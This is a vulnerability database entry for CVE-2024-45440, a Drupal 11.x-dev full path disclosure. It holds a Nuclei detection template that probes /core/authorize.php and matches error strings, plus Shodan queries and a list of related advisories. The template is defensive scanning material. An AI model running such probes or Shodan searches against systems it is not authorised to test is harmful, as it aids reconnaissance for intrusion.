Drupal 11.x-dev - Full Path Disclosure

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | github.com

Drupal 11.x-dev Full Path Disclosure in authorize.ph

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| GithubExploit | Exploit for Generation of Error Message Containing Sensitive Information in Drupal | 10 Feb 2026 16:18 | githubexploit |
| BDU FSTEC | The vulnerability of the /core/authorize.php file in the Drupal CMS system allows a hacker to disclose protected information. | 3 Oct 2024 00:00 | bdu_fstec |
| Circl | CVE-2024-45440 | 29 Aug 2024 13:42 | circl |
| CNNVD | Drupal security vulnerability | 29 Aug 2024 00:00 | cnnvd |
| CVE | CVE-2024-45440 | 29 Aug 2024 00:00 | cve |
| Cvelist | CVE-2024-45440 | 29 Aug 2024 00:00 | cvelist |
| Exploit DB | Drupal 11.x-dev - Full Path Disclosure | 19 Apr 2025 00:00 | exploitdb |
| Github Security Blog | Drupal Full Path Disclosure | 29 Aug 2024 12:31 | github |
| NVD | CVE-2024-45440 | 29 Aug 2024 11:15 | nvd |
| OpenVAS | Drupal Information Disclosure Vulnerability (GHSA-mg8j-w93w-xjgc) - Linux - Version Check | 3 Feb 2025 00:00 | openvas |

Code

id: CVE-2024-45440

info:
  name: Drupal 11.x-dev - Full Path Disclosure
  author: DhiyaneshDK
  severity: medium
  description: |
    core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.
  impact: |
    Attackers can obtain full path disclosure information even when error logging is disabled.
  remediation: |
    Configure hash_salt properly and ensure it references an existing file, or update to a patched Drupal version.
  reference:
    - https://senscybersecurity.nl/CVE-2024-45440-Explained/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45440
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-45440
    cwe-id: CWE-209
    epss-score: 0.09269
    epss-percentile: 0.94752
    cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: drupal
    product: drupal
    shodan-query:
      - http.component:"drupal"
      - cpe:"cpe:2.3:a:drupal:drupal"
  tags: cve,cve2024,drupal,exposure,error,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/core/authorize.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "getHashSalt"
          - "RuntimeException"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022077d6baebdcc5c3b475fce553bbd6d4bc33a57d5fc63ef0ad4e9b598d3a4c58060220589dcde02d67a37033d65658fdb3942eaeb634c189e05eec175045a9ac09493a:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 6.1 (Medium risk)
CVSS 3.1: 5.3
EPSS: 0.09269